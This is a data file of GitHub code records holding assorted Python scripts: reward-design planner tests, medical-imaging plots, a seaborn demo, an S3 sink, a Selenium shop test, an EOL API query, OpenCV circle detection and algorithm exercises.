sys.exit(app.exec_())\n","repo_name":"rntafirenyika/Portfolio","sub_path":"6. BSC Computing - Unisa/Year 1/INF1511 Visual Programming 1 with Python/OneDrive_2023-09-12/INF1511 GUI/List example/callListNancy.pyw","file_name":"callListNancy.pyw","file_ext":"pyw","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"32386449493","text":"import numpy as np\nimport random\nimport tensorflow as tf\nimport unittest\nfrom itertools import product\n\nfrom planner import GridworldModel, BanditsModel\nfrom gridworld import Direction\nfrom gridworld import GridworldMdp, GridworldMdpWithDistanceFeatures\nfrom gridworld import NStateMdpGaussianFeatures\nfrom agents import OptimalAgent, ImmediateRewardAgent\n\n\nclass TestPlanner(unittest.TestCase):\n\n\n def test_gridworld_planner(self):\n def check_model_equivalent(model, query, weights, mdp, num_iters):\n with tf.Session() as sess:\n sess.run(model.initialize_op)\n (qvals,) = model.compute(\n ['q_values'], sess, mdp, query, weight_inits=weights)\n\n agent = OptimalAgent(gamma=model.gamma, num_iters=num_iters)\n for i, proxy in enumerate(model.proxy_reward_space):\n for idx, val in zip(query, proxy):\n mdp.rewards[idx] = val\n agent.set_mdp(mdp)\n check_qvals_equivalent(qvals[i], agent, mdp)\n\n def check_qvals_equivalent(qvals, agent, mdp):\n for state in mdp.get_states():\n if mdp.is_terminal(state):\n continue\n x, y = state\n for action in mdp.get_actions(state):\n expected_q = agent.qvalue(state, action)\n action_num = Direction.get_number_from_direction(action)\n actual_q = qvals[y, x, action_num]\n # Using softmax, not max, so expect limited accuracy\n self.assertAlmostEqual(expected_q, actual_q, places=2)\n\n np.random.seed(1)\n random.seed(1)\n dim = 4\n grid = GridworldMdp.generate_random(8, 8, 0.1, dim)\n mdp = GridworldMdpWithDistanceFeatures(grid)\n mdp.rewards = np.random.randint(-9, 10, size=[dim])\n query = [0, 3]\n other_weights = mdp.rewards[1:3]\n # Use beta_planner = 1000 so that softmax is approximately max\n model = GridworldModel(\n dim, 0.9, len(query), 2, 1, None, 1, 1000, [], 0.1, False, True,\n 8, 8, 25)\n check_model_equivalent(model, query, other_weights, mdp, 25)\n\n\n\n def test_bandits_planner(self):\n def check_model_equivalent(model, query, weights, mdp, num_iters):\n with tf.Session() as sess:\n sess.run(model.initialize_op)\n (qvals,) = model.compute(['q_values'], sess, mdp, query, weight_inits=weights)\n\n agent = ImmediateRewardAgent(gamma=model.gamma)\n for i, proxy in enumerate(model.proxy_reward_space):\n mdp.change_reward(proxy)\n\n # for idx, val in zip(query, proxy):\n # mdp.rewards[idx] = val\n agent.set_mdp(mdp)\n check_qvals_equivalent(qvals[:,i], agent, mdp)\n\n def check_qvals_equivalent(qvals, agent, mdp):\n for state in mdp.get_states():\n if mdp.is_terminal(state):\n return\n expected_q = agent.qvalue(state, state)\n actual_q = qvals[state]\n self.assertAlmostEqual(expected_q, actual_q, places=5)\n\n dim = 5\n weights = np.random.randint(-9, 10, size=[dim])\n mdp = NStateMdpGaussianFeatures(\n num_states=7, rewards=weights, start_state=0,\n preterminal_states=[], feature_dim=dim, num_states_reachable=7)\n # query = [0, 2, 3]\n query = [0, 1, 2, 3, 4]\n # other_weights = np.array([weights[1], weights[4]])\n other_weights = np.zeros(0)\n model = BanditsModel(\n dim, 0.9, len(query), 2, 1, None, 1, 1000, [], 0.1, False, True)\n check_model_equivalent(model, query, other_weights, mdp, 20)\n\n\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"SoerenMind/Inverse_Reward_Design","sub_path":"Code/planner_test.py","file_name":"planner_test.py","file_ext":"py","file_size_in_byte":3836,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"36"}
+{"seq_id":"28949398831","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as mcolors\n\n#The code use to create the lower row of Figure 2\n#Plot the concept predictions for the FGADR testset for each DR level.\n\n#Inspect the FGADR test set instead:\nconceptPredictions_test = pd.read_csv('./SequentialModelOutput/RawDensenet121_conceptPredictions_FGADRTestset.csv',index_col = 'Unnamed: 0')\n\n#Counting number of positive predictions for MA\nMA_level0_predictions = 0\nMA_level1_predictions = 0\nMA_level2_predictions= 0\nMA_level3_predictions = 0\nMA_level4_predictions = 0\n#Repeat for HE:\nHE_level0_predictions = 0\nHE_level1_predictions = 0\nHE_level2_predictions= 0\nHE_level3_predictions = 0\nHE_level4_predictions = 0\n#Soft exudates:\nSoftEx_level0_predictions = 0\nSoftEx_level1_predictions = 0\nSoftEx_level2_predictions= 0\nSoftEx_level3_predictions = 0\nSoftEx_level4_predictions = 0\n#Hard exudates:\nHardEx_level0_predictions = 0\nHardEx_level1_predictions = 0\nHardEx_level2_predictions= 0\nHardEx_level3_predictions = 0\nHardEx_level4_predictions = 0\n#NV:\nNV_level0_predictions = 0\nNV_level1_predictions = 0\nNV_level2_predictions= 0\nNV_level3_predictions = 0\nNV_level4_predictions = 0\n#IRMA:\nIRMA_level0_predictions = 0\nIRMA_level1_predictions = 0\nIRMA_level2_predictions= 0\nIRMA_level3_predictions = 0\nIRMA_level4_predictions = 0\n\n#Count the number of observations for each DR level: \nlevel0_count = 0\nlevel1_count = 0\nlevel2_count = 0\nlevel3_count = 0\nlevel4_count = 0\nfor i in range(conceptPredictions_test.shape[0]):\n #Get the DR level\n dr_level = conceptPredictions_test.iloc[i,-1]\n print('Level of DR:',dr_level)\n #Get the raw concept predictions:\n concept_data = conceptPredictions_test.iloc[i,1]\n #Since these are (of unknown causes) interpreted as a string-list\n #We need to convert them to a proper list of float-values:\n concept_data = concept_data.strip('\"')\n concept_data = concept_data.strip('[]')\n concept_data = list(concept_data.split(','))\n concept_data = list(map(float,concept_data))\n print('Concept data:',concept_data)\n ma_concept = concept_data[0]\n he_concept = concept_data[1]\n softEx_concept = concept_data[2]\n hardEx_concept = concept_data[3]\n nv_concept = concept_data[4]\n irma_concept = concept_data[5]\n print('MA concept:',ma_concept)\n print('NV concept:',nv_concept)\n if dr_level == 0:\n level0_count+=1\n if ma_concept>=0:\n MA_level0_predictions+=1\n if he_concept>=0:\n HE_level0_predictions+=1\n if softEx_concept>=0:\n SoftEx_level0_predictions+=1\n if hardEx_concept>=0:\n HardEx_level0_predictions+=1\n if nv_concept>=0:\n NV_level0_predictions+=1\n if irma_concept>=0:\n IRMA_level0_predictions+=1\n elif dr_level ==1:\n level1_count+=1\n if ma_concept>=0:\n MA_level1_predictions+=1\n if he_concept>=0:\n HE_level1_predictions+=1\n if softEx_concept>=0:\n SoftEx_level1_predictions+=1\n if hardEx_concept>=0:\n HardEx_level1_predictions+=1\n if nv_concept>=0:\n NV_level1_predictions+=1\n if irma_concept>=0:\n IRMA_level1_predictions+=1\n elif dr_level == 2:\n level2_count+=1\n if ma_concept>=0:\n MA_level2_predictions+=1\n if he_concept>=0:\n HE_level2_predictions+=1\n if softEx_concept>=0:\n SoftEx_level2_predictions+=1\n if hardEx_concept>=0:\n HardEx_level2_predictions+=1\n if nv_concept>=0:\n NV_level2_predictions+=1\n if irma_concept>=0:\n IRMA_level2_predictions+=1\n elif dr_level == 3:\n level3_count+=1\n if ma_concept>=0:\n MA_level3_predictions+=1\n if he_concept>=0:\n HE_level3_predictions+=1\n if softEx_concept>=0:\n SoftEx_level3_predictions+=1\n if hardEx_concept>=0:\n HardEx_level3_predictions+=1\n if nv_concept>=0:\n NV_level3_predictions+=1\n if irma_concept>=0:\n IRMA_level3_predictions+=1\n elif dr_level == 4:\n level4_count+=1\n if ma_concept>=0:\n MA_level4_predictions+=1\n if he_concept>=0:\n HE_level4_predictions+=1\n if softEx_concept>=0:\n SoftEx_level4_predictions+=1\n if hardEx_concept>=0:\n HardEx_level4_predictions+=1\n if nv_concept>=0:\n NV_level4_predictions+=1\n if irma_concept>=0:\n IRMA_level4_predictions+=1\n \nprint('MA for DR level 0:', MA_level0_predictions)\nprint('HE for DR level 0:',HE_level0_predictions)\nprint('SoftEx for DR level 0:',SoftEx_level0_predictions)\nprint('HardEx for DR level 0:',HardEx_level0_predictions)\nprint('NV for DR level 0:',NV_level0_predictions)\nprint('IRMA for DR level 0:',IRMA_level0_predictions)\n\nprint('MA for DR level 1:', MA_level1_predictions)\nprint('HE for DR level 1:',HE_level1_predictions)\nprint('SoftEx for DR level 1:',SoftEx_level1_predictions)\nprint('HardEx for DR level 1:',HardEx_level1_predictions)\nprint('NV for DR level 1:',NV_level1_predictions)\nprint('IRMA for DR level 1:',IRMA_level1_predictions)\n\nprint('MA for DR level 2:', MA_level2_predictions)\nprint('HE for DR level 2:',HE_level2_predictions)\nprint('SoftEx for DR level 2:',SoftEx_level2_predictions)\nprint('HardEx for DR level 2:',HardEx_level2_predictions)\nprint('NV for DR level 2:',NV_level2_predictions)\nprint('IRMA for DR level 2:',IRMA_level2_predictions)\n\nprint('MA for DR level 3:', MA_level3_predictions)\nprint('HE for DR level 3:',HE_level3_predictions)\nprint('SoftEx for DR level 3:',SoftEx_level3_predictions)\nprint('HardEx for DR level 3:',HardEx_level3_predictions)\nprint('NV for DR level 3:',NV_level3_predictions)\nprint('IRMA for DR level 3:',IRMA_level3_predictions)\n\nprint('MA for DR level 4:', MA_level4_predictions)\nprint('HE for DR level 4:',HE_level4_predictions)\nprint('SoftEx for DR level 4:',SoftEx_level4_predictions)\nprint('HardEx for DR level 4:',HardEx_level4_predictions)\nprint('NV for DR level 4:',NV_level4_predictions)\nprint('IRMA for DR level 4:',IRMA_level4_predictions)\n\nprint('Total number of level 0 images:',level0_count)\nprint('Total number of level 1 images:',level1_count)\nprint('Total number of level 2 images:',level2_count)\nprint('Total number of level 3 images:',level3_count)\nprint('Total number of level 4 images:',level4_count)\n\n#plot barcharts for each DR level\nnum_concepts = 6\nbar_width = 0.35\n# create location for each bar. scale by an appropriate factor to ensure \n# the final plot doesn't have any parts overlapping\nindex = np.arange(num_concepts) * bar_width\nprint('Index:',index)\nmy_colors = mcolors.TABLEAU_COLORS\nnames = list(my_colors)\nprint('Colors to choose:',names)\nbar_x = []\nplot_conceptNames = ['MA','HE','EX','SE','IRMA','NV']\n#Divide by number of images (50 for each DR level) to get the percentage concept count ranging from 0 to 1\nlevel_0_conceptCounts = [MA_level0_predictions/level0_count,HE_level0_predictions/level0_count,HardEx_level0_predictions/level0_count,SoftEx_level0_predictions/level0_count,IRMA_level0_predictions/level0_count,NV_level0_predictions/level0_count]\nlevel_1_conceptCounts = [MA_level1_predictions/level1_count,HE_level1_predictions/level1_count,HardEx_level1_predictions/level1_count,SoftEx_level1_predictions/level1_count,IRMA_level1_predictions/level1_count,NV_level1_predictions/level1_count]\nlevel_2_conceptCounts = [MA_level2_predictions/level2_count,HE_level2_predictions/level2_count,HardEx_level2_predictions/level2_count,SoftEx_level2_predictions/level2_count,IRMA_level2_predictions/level2_count,NV_level2_predictions/level2_count]\nlevel_3_conceptCounts = [MA_level3_predictions/level3_count,HE_level3_predictions/level3_count,HardEx_level3_predictions/level3_count,SoftEx_level3_predictions/level3_count,IRMA_level3_predictions/level3_count,NV_level3_predictions/level3_count]\nlevel_4_conceptCounts = [MA_level4_predictions/level4_count,HE_level4_predictions/level4_count,HardEx_level4_predictions/level4_count,SoftEx_level4_predictions/level4_count,IRMA_level4_predictions/level4_count,NV_level4_predictions/level4_count]\nfor i in range(6):\n bar_x.append(i*bar_width)\n#Plotting the predicted concept counts for DR levels 1-4 \n#In order to compare with the TCAV scores\nfig, ax = plt.subplots(1,4, figsize=(32,8))\n\n#https://matplotlib.org/3.1.0/gallery/subplots_axes_and_figures/subplots_demo.html#sphx-glr-gallery-subplots-axes-and-figures-subplots-demo-py\n#DR level 1\nax[0].bar(bar_x, level_1_conceptCounts, bar_width, label=plot_conceptNames, \n color=['tab:blue','tab:orange','tab:green','tab:red','tab:purple','tab:brown'])\nax[0].set_title('DR level 1',fontsize=32)\nax[0].set_xticks(bar_x)\nax[0].set_xticklabels(plot_conceptNames, rotation = 75,fontsize=32)\nax[0].set_ylim((0,1.05))\n\n#DR level 2\nax[1].bar(bar_x, level_2_conceptCounts, bar_width, label=plot_conceptNames, \n color=['tab:blue','tab:orange','tab:green','tab:red','tab:purple','tab:brown'])\nax[1].set_title('DR level 2',fontsize=32)\nax[1].set_xticks(bar_x)\nax[1].set_xticklabels(plot_conceptNames, rotation = 75,fontsize=32)\nax[1].set_ylim((0,1.05))\n\n#DR level 3\nax[2].bar(bar_x, level_3_conceptCounts, bar_width, label=plot_conceptNames, \n color=['tab:blue','tab:orange','tab:green','tab:red','tab:purple','tab:brown'])\nax[2].set_title('DR level 3',fontsize=32)\nax[2].set_xticks(bar_x)\nax[2].set_xticklabels(plot_conceptNames, rotation = 75,fontsize=32)\nax[2].set_ylim((0,1.05))\n\n#DR level 4\nax[3].bar(bar_x, level_4_conceptCounts, bar_width, label=plot_conceptNames, \n color=['tab:blue','tab:orange','tab:green','tab:red','tab:purple','tab:brown'])\nax[3].set_title('DR level 4',fontsize=32)\nax[3].set_xticks(bar_x)\nax[3].set_xticklabels(plot_conceptNames, rotation = 75,fontsize=32)\nax[3].set_ylim((0,1.05))\n\nax[0].set_ylabel('Concept count',fontsize=32)\nax[0].set_yticklabels([0.0,0.2,0.4,0.6,0.8,1.0],fontsize=32)\n# Hide x labels and tick labels for top plots and y ticks for right plots.\nax[1].label_outer()\nax[2].label_outer()\nax[3].label_outer()\n\n\n#Shrink the space between the subplots:\nplt.subplots_adjust(wspace=0.1)\nplt.savefig('PlotBottleneckConceptCounts_FGADRTestset_subplots.png', bbox_inches = 'tight')\n","repo_name":"AndreaStoraas/ConceptExplanations_DR_grading","sub_path":"SequentialBottleneck_experiments/PlotConceptPredictions_FGADRTestset.py","file_name":"PlotConceptPredictions_FGADRTestset.py","file_ext":"py","file_size_in_byte":10311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"37407092455","text":"# Demo code to show how to use pandas nad seaborn\r\nimport seaborn as sns\r\n\r\n\r\n# loads test data\r\niris_df = sns.load_dataset(\"iris\") # ['sepal_length', 'sepal_width', 'petal_length', 'petal_width', 'species']\r\n\r\n\r\n\r\nprint(iris_df.columns) # Get your df columns\r\n\r\n# stores only the species\r\nspecies = iris_df[\"species\"]\r\nprint(species)\r\n\r\n# stores only the petal info\r\npetal_info = iris_df[[\"sepal_length\", \"sepal_width\", \"petal_length\", \"petal_width\"]]\r\nprint(petal_info)\r\n\r\n# stoes the petals smaller than 4.5\r\nsmall_sepal_length = iris_df[iris_df[\"sepal_length\"] < 4.5 ]\r\nprint(small_sepal_length)\r\n\r\n\r\n# stoes the mean for sepal width per species\r\nmean_sepal_width = iris_df.groupby(\"species\")[\"sepal_width\"].mean()\r\nprint(mean_sepal_width)\r\n\r\n\r\n# import matplotlib to display charts\r\nimport matplotlib.pyplot as plt\r\n\r\n# Shows the bar chart of sepal width average per species\r\nplt.figure()\r\n# passes data to display to the barplot method\r\n# sns.barplot(x=\"sepal_width\", y=\"species\", data=iris_df)\r\n\r\nsns.scatterplot(x=\"sepal_length\", y=\"sepal_width\", data=iris_df)\r\n\r\n# displays chart \r\nplt.show()\r\n\r\n# This will return a histogram\r\nsns.histplot(data=iris_df, x=\"sepal_width\") # Histogram\r\nplt.show()\r\n# This will return a boxplot\r\nsns.boxplot(y=iris_df[\"sepal_width\"])\r\n\r\n# Box plot using plt\r\n\r\nplt.boxplot(iris_df[\"sepal_width\"]) # Matplotlib ###\r\nplt.show()\r\n# Vioin plot\r\n\r\nsns.violinplot(y=iris_df[\"sepal_length\"])\r\nplt.show()\r\n# Countplot\r\n\r\nsns.countplot(x='species', data=iris_df)\r\nplt.show()\r\n\r\n# Pairplot\r\nsns.pairplot(iris_df);","repo_name":"HyperionDevBootcamps/C4_DS_lecture_examples","sub_path":"Lecture code/Data Analysis and Visualisation/data_visualisations_examples.py","file_name":"data_visualisations_examples.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"36"}
+{"seq_id":"70050077863","text":"import os\nimport tempfile\nfrom typing import Iterator, List, Optional, Tuple\n\nimport boto3\n\nfrom pipereport.base.sink import BaseSink\n\n\nclass S3Sink(BaseSink):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n client_args = {\"service_name\": \"s3\"}\n endpoint_url = kwargs.pop(\"endpoint_url\", None)\n if endpoint_url is not None:\n client_args[\"endpoint_url\"] = endpoint_url\n client_args[\"aws_access_key_id\"] = self.required_credential(\"aws_access_key_id\")\n client_args[\"aws_secret_access_key\"] = self.required_credential(\n \"aws_secret_access_key\"\n )\n self.client_args = client_args\n\n self.bucket = self.required_field(\"bucket\")\n\n self.session = None\n self.s3 = None\n\n def connect(self):\n self.session = boto3.session.Session()\n self.s3 = self.session.client(**self.client_args)\n\n def write_block(\n self,\n source_iterator: Iterator[Tuple],\n object_id: str,\n blocksize: int = -1,\n columns: Optional[List[str]] = None,\n sep: str = \"\\t\",\n ):\n self.telemetry.add_object(object_id, columns)\n with tempfile.TemporaryDirectory() as tmpdirname:\n cachefiledir = os.path.join(tmpdirname, os.path.dirname(object_id))\n if cachefiledir and not os.path.exists(cachefiledir):\n os.makedirs(cachefiledir)\n cachefile = os.path.join(tmpdirname, object_id)\n with open(cachefile, \"w\") as cache:\n block_written = 0\n for entry in source_iterator:\n cache.write(sep.join(entry) + \"\\n\")\n block_written += 1\n if block_written == blocksize:\n break\n self.telemetry.add_entries(object_id, block_written)\n self.s3.upload_file(cachefile, self.bucket, object_id)\n","repo_name":"enchantner/pipereport","sub_path":"pipereport/sink/s3.py","file_name":"s3.py","file_ext":"py","file_size_in_byte":1926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"37722790950","text":"'''\n商品浏览\n'''\n\nfrom common.base import Base\nfrom time import sleep\nurl = \"http://ecshop.itsoso.cn/\"\n\nclass Goodslist_Page(Base):\n \"\"\"封装表现层:制作定位器\"\"\"\n # 首页元素的定位\n first_page_loc = (\"link text\", \"首页\")\n send_loc = (\"name\", \"keywords\")\n search_loc = (\"value\", \"搜索\")\n\n\n def click_first(self):\n \"\"\"点击首页\"\"\"\n self.click(self.first_page_loc)\n\n def get_goods_text(self, locator):\n \"\"\"获取商品文本\"\"\"\n goods_elements = self.find_elements(locator)\n texts = []\n for goods_element in goods_elements:\n text = goods_element.text # 获取单个商品的文本\n texts.append(text)\n return texts\n\n def click_texts(self, locator1,locator2):\n \"\"\"\n\n :param locator1: 商品类的元素定位器\n :param locator2: 商品���表的定位器\n :return:\n \"\"\"\n # 取出商品类的所有文本\n texts = self.get_goods_text(locator1)\n for text in texts:\n good_loc = (\"link text\", text)\n self.click(good_loc)\n self.click_all_element(locator2)\n\n def get_goods_title(self, locator):\n \"\"\"获取商品标题\"\"\"\n goods_elements = self.find_elements(locator)\n # 获取商品标题\n titles = [] # 准备一个列表装商品标题\n for goods_element in goods_elements:\n # title就是表示元素的属性值\n title = goods_element.get_attribute(\"title\")\n titles.append(title)\n return titles\n\n def click_all_element(self, locator):\n \"\"\"点击所有元素\"\"\"\n titles = self.get_goods_title(locator)\n for title in titles:\n # 重新制作单个商品的定位器\n goods_loc = (\"css selector\", f\"a[title='{title}']\")\n self.click(goods_loc)\n self.back()\n self.next_page()\n\n def next_page(self):\n # 下一页的定位器\n next_loc = (\"link text\", \"下一页\")\n # 点击下一页\n # 判断有没有下一页的元素,有就点击元素,没有就返回首页\n while True:\n if self.displayed(next_loc):\n self.click(next_loc)\n else:\n self.click(self.first_page_loc)\n break\n\n\n def input_goods(self,text):\n \"\"\"输入搜索商品名\"\"\"\n self.send_keys(self.send_loc,text)\n\n def click_search(self):\n \"\"\"点击搜索按钮\"\"\"\n self.click(self.search_loc)\n\nif __name__ == '__main__':\n from common.base import open_browser\n\n driver = open_browser()\n goods = Goodslist_Page(driver) # 实例化login page\n goods.open_url(url) # 打开网址\n goods.click_first() # 点击首页\n categary_loc = (\"css selector\", \"div.cat-box>div.cat1>a\") # 商品类的定位器\n goods_loc = (\"css selector\", \"div.goods-title>a\") # 商品列表的定位器\n goods.click_texts(categary_loc, goods_loc) # 点击商品类\n","repo_name":"15008477526/-","sub_path":"web_aaaaaaaa/page/goods_list_page.py","file_name":"goods_list_page.py","file_ext":"py","file_size_in_byte":3011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"28923311211","text":"#1194. 달이 차오른다, 가자!\n\"\"\"\nBitmasking + BFS Technique \n\n상태공간의 정의 \n\ndists[i][j][key] = (i,j)인데 현재 status가 key인 것.\n\"\"\"\n\nimport sys \ninput = sys.stdin.readline \nfrom collections import deque \n\nN,M = map(int, input().rstrip().split())\n\nboards = []\nstart = (-1,-1)\nends = []\n\ndists = [[[-1] * M for _ in range(N)] for _ in range(64)]\n\nfor row in range(N):\n each_row = list(input().rstrip())\n boards.append(each_row)\n for col in range(M):\n if each_row[col] == \"0\" : \n start = (row,col)\n elif each_row[col] == \"1\" :\n ends.append((row,col))\n\n \n \n#방문 로직은 bfs 함수에서 검증하자!\n\"\"\"\n2500 * 64\n\n\n- RangeOut / Visit 여부 확인\n\n- Key가 있을 때 방문가능 여부 확인! (status check)\n\n\"\"\"\n\ns_row, s_col = start\n\ndists[0][s_row][s_col] = 0\ndeq = deque([(0,s_row,s_col)])\n\ndx = [-1,1,0,0]\ndy = [0,0,1,-1]\n\n\n\n\ndef bfs(deq, dist):\n while deq:\n key, cur_x, cur_y = deq.popleft()\n # print(f\"key:{key}, cur_x:{cur_x}, cur_y:{cur_y}, distance: {dists[key][cur_x][cur_y]}\")\n for i in range(4):\n nx = cur_x + dx[i] ; ny = cur_y + dy[i]\n #Rangeout, Visit, Wall 무시\n if nx<0 or ny<0 or nx>=N or ny>=M : continue \n if boards[nx][ny] == \"#\" : continue\n if dists[key][nx][ny]>=0: \n continue\n \n if boards[nx][ny].islower():\n order = ord(boards[nx][ny])-97\n new_key = (key | (1<(r:Resource), \\\n\t\t\t(t)-[:predicate]->(pred:Term) \\\n\t\tWHERE p.canonical = '\" + name + \"'\"\\\n\t\t\"OPTIONAL MATCH (t)-[:units_term]->(units:Term) \\\n\t\tOPTIONAL MATCH (t)-[:object_term]->(obj:Term) \\\n\t\tOPTIONAL MATCH (t)-[:normal_units_term]->(normal_units:Term) \\\n\t\tOPTIONAL MATCH (t)-[:sex_term]->(sex:Term) \\\n\t\tOPTIONAL MATCH (t)-[:lifestage_term]->(lifestage:Term) \\\n\t\tOPTIONAL MATCH (t)-[:statistical_method_term]->(stats:Term) \\\n\t\tRETURN p.canonical, pred.name, obj.name, t.literal, t.measurement, units.name, t.normal_measurement, normal_units.name, sex.name, lifestage.name, stats.name, stats.comment, r.resource_id, p.page_id, t.eol_pk, t.source \\\n\t\tLIMIT 500\"\n\ndata = {\"query\" : query,\n\t\t\"format\" : \"cypher\"}\n\n# Send api call\nr = requests.get(eol_base_url,\n\t\t\t\theaders = {\"accept\" : \"application/json\",\n\t\t\t\t\t\t\t\"authorization\" : \"JWT \" + eol_tok},\n\t\t\t\tparams = data)\n\nj = r.json()\n\n# Convert to df\ndf = pd.DataFrame(j[\"data\"])\ndf.columns = j[\"columns\"]\n\n# Drop rows where source is anage or iucn\ndf[\"t.source\"] = df[\"t.source\"].fillna(value = \"NA\")\ndf[\"Ignore_source\"] = [1 if any(s in x for s in[\"genomics.senescence\", \"iucn\"]) else 0 for x in df[\"t.source\"].tolist()]\n\ndf = df[df[\"Ignore_source\"] != 1]\n\ndf_datafields = df[\"pred.name\"].unique().tolist()\n\n# Extract relevant data\n# Habitat related data\nif \"habitat includes\" in df_datafields:\n\toutput[\"habitat\"][\"habitats\"] = df.loc[df[\"pred.name\"] == \"habitat includes\", \"obj.name\"].unique().tolist()\n\n# Pretty much countries of occurence but sum within county data too...\nif \"geographic distribution includes\" in df_datafields:\n\toutput[\"habitat\"][\"countries_of_occurrence\"][\"value\"] = df.loc[df[\"pred.name\"] == \"geographic distribution includes\", \"obj.name\"].tolist()\n\toutput[\"habitat\"][\"countries_of_occurrence\"][\"unit\"] = \"Extant in country\"\n\n# Native range\nif \"native range includes\" in df_datafields:\n\toutput[\"habitat\"][\"native_range\"][\"value\"] = df.loc[df[\"pred.name\"] == \"native range includes\", \"obj.name\"].tolist()\n\toutput[\"habitat\"][\"native_range\"][\"unit\"] = \"Locations where the species is native\"\n\n# Introduced locations\nif \"introduced range includes\" in df_datafields:\n\toutput[\"habitat\"][\"introduced_range\"][\"value\"] = df.loc[df[\"pred.name\"] == \"introduced range includes\", \"obj.name\"].tolist()\n\toutput[\"habitat\"][\"introduced_range\"][\"unit\"] = \"Locations where the species has been introduced\"\n\n\nif \"body mass\" in df_datafields:\n\tif df.loc[(df[\"pred.name\"] == \"body mass\") &\n\t\t\t\t(df[\"lifestage.name\"].isnull()) &\n\t\t\t\t(df[\"stats.name\"] == \"max\"),:].shape[0] > 0:\n\t\toutput[\"life_history_traits\"][\"bodymass\"][\"adult_bodymass\"][\"value\"] = df.loc[(df[\"pred.name\"] == \"body mass\") & (df[\"lifestage.name\"].isnull()) & (df[\"stats.name\"] == \"max\"), \"t.normal_measurement\"].values[0]\n\t\toutput[\"life_history_traits\"][\"bodymass\"][\"adult_bodymass\"][\"unit\"] = df.loc[(df[\"pred.name\"] == \"body mass\") & (df[\"lifestage.name\"].isnull()) & (df[\"stats.name\"] == \"max\"), \"normal_units.name\"].values[0]\n\n\nprint (json.dumps(output, indent=4, sort_keys=False))\n# May be more data, depends on species searched for...\n# Generally not much for parrots.\n\n# Not normally in reduced df\n# Population trend\n# if \"population trend\" in df_datafields:\n# \toutput[\"population\"][\"population_trend\"][\"value\"] = df.loc[df[\"pred.name\"] == \"population trend\", \"t.literal\"].values[0]\n\n# # Weights/bodymass??\n# if \"weight\" in df_datafields:\n# \tif df.loc[(df[\"pred.name\"] == \"weight\") & (df[\"lifestage.name\"] == \"adult\"),:].shape[0] > 0:\n# \t\toutput[\"bodymass\"][\"adult_bodymas\"][\"value\"] = df.loc[(df[\"pred.name\"] == \"weight\") & (df[\"lifestage.name\"] == \"adult\"), \"t.normal_measurement\"].values[0]\n# \t\toutput[\"bodymass\"][\"adult_bodymas\"][\"unit\"] = df.loc[(df[\"pred.name\"] == \"weight\") & (df[\"lifestage.name\"] == \"adult\"), \"normal_units.name\"].values[0]\n# \tif df.loc[(df[\"pred.name\"] == \"weight\") & (df[\"lifestage.name\"] == \"weanling\"),:].shape[0] > 0:\n# \t\tdf.loc[(df[\"pred.name\"] == \"weight\") & (df[\"lifestage.name\"] == \"weanling\"), \"t.normal_measurement\"].values[0]\n# \t\tdf.loc[(df[\"pred.name\"] == \"weight\") & (df[\"lifestage.name\"] == \"weanling\"), \"normal_units.name\"].values[0]\n# \tif df.loc[(df[\"pred.name\"] == \"weight\") & (df[\"lifestage.name\"] == \"neonate stage\"),:].shape[0] > 0:\n# \t\tdf.loc[(df[\"pred.name\"] == \"weight\") & (df[\"lifestage.name\"] == \"neonate stage\"), \"t.normal_measurement\"].values[0]\n# \t\tdf.loc[(df[\"pred.name\"] == \"weight\") & (df[\"lifestage.name\"] == \"neonate stage\"), \"normal_units.name\"].values[0]\n","repo_name":"ConMine/ConMine","sub_path":"Development/Code/eol.py","file_name":"eol.py","file_ext":"py","file_size_in_byte":5176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"23400386130","text":"import cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport os\nos.chdir('C:\\\\Users\\\\sachi\\\\.vscode\\\\GitHubRepos\\\\OSCV_Exercises')\nexetasknum = 1\n\nif exetasknum==1:\n img = cv2.imread('opencv-logo-white.png',0)\n img = cv2.medianBlur(img,5)\n cimg = cv2.cvtColor(img,cv2.COLOR_GRAY2BGR)\n\n circles = cv2.HoughCircles(img,cv2.HOUGH_GRADIENT,1,20,\n param1=50,param2=30,minRadius=0,maxRadius=0)\n # apparently, Param2 changes the number of circles detected\n circles = np.uint16(np.around(circles))\n for i in circles[0,:]:\n # draw the outer circle\n cv2.circle(cimg,(i[0],i[1]),i[2],(0,255,0),2)\n # draw the center of the circle\n cv2.circle(cimg,(i[0],i[1]),2,(0,0,255),3)\n\n cv2.imshow('detected circles',cimg)\n cv2.waitKey(0)\n cv2.destroyAllWindows()","repo_name":"sachingadgil/OSCV_Exercises","sub_path":"OpenCV_Python_Tutorials/029 Hough Circle Transform.py","file_name":"029 Hough Circle Transform.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"34427295995","text":"class Solution(object):\n def rearrangeBarcodes(self, barcodes):\n \"\"\"\n :type barcodes: List[int]\n :rtype: List[int]\n \"\"\"\n \n freqs = {}\n for b in barcodes:\n \tif not b in freqs:\n \t\tfreqs[b] = 0\n \tfreqs[b] += 1\n\n max_freq = 0\n for c in freqs:\n \tmax_freq = max_freq(freqs[c], max_freq)\n\n ","repo_name":"MuhammadAbuBakar95/Problem-Solving","sub_path":"two-heaps/rearrangeBarcodes.py","file_name":"rearrangeBarcodes.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
